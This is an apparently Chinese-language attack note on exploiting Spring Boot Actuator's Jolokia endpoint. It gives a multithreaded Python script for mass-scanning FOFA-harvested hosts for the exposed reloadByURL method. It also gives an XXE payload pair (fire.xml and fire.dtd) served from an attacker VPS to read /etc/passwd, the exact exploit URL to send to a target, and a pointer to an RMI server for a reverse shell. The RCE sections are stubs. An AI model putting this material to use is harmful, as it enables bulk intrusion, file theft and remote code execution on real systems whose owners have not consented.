Spring Boot Actuator 漏洞利用
漏洞检测:
spring存在目录:/jolokia/list
并且返回的json中有“reloadByURL”
关于路径问题:1.x版本的在根路径下注册路由,2.x版本则需要加/actuator/
写个批量脚本检测一下
import threading
import argparse
import requests
import queue
def readfile():
with open('fofa_spring.txt', 'r') as f:
for i in f.readlines():
i = i.strip()
if i[:4] != 'http':
i = 'http://' + i
q.put(i)
print('文件加载完毕!!!\n')
def writefile(p):
with open('sucess.txt', 'a') as f:
f.write(p+'\n')
def check():
c = q.get()
try:
r = requests.get(c+url, timeout=0.5)
if 'reloadByURL' in r.text and r.status_code == 200:
print('\033[1;31;40m[+]Yes: \033[0m'+c+url)
writefile(c+url)
else:
r = requests.get(c+url2, timeout=0.5)
if 'reloadByURL' in r.text and r.status_code == 200:
print('\033[1;31;40m[+]Yes: \033[0m'+c+url)
writefile(c + url)
else:
print('[-]NO: '+c)
except:
pass
def batch():
while not q.empty():
check()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='*********Spring Boot Actuator*********')
group = parser.add_mutually_exclusive_group()
group.add_argument("-b", "--batch", action="store_true", help='批量检测当前目录url.txt中的url生成success.txt')
args = parser.parse_args()
q = queue.Queue()
list = []
url = '/jolokia/list'
url2 = '/actuator/jolokia/list'
if args.batch:
readfile()
for i in range(10): #10个线程
t = threading.Thread(target=batch)
t.start()
xxe
vps起web服务:
python3 -m http.server 80
vps放入文件fire.xml 和fire.dtd
fire.xml
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE a [ <!ENTITY % remote SYSTEM "http://vps-ip/fire.dtd">%remote;%int;]>
<a>&trick;</a>
fire.dtd
<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>">
访问目标网站:
target-ip/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/vps-ip!/fire.xml
成功读取
reloadByURL RCE
reloadByURL 远程加载xml指定恶意的RMI服务
下载 这个zip 到vps解压 修改里面的EvilRMIServer.java 文件 反弹shell的地址。
pass…
createJNDIRealm RCE
pass…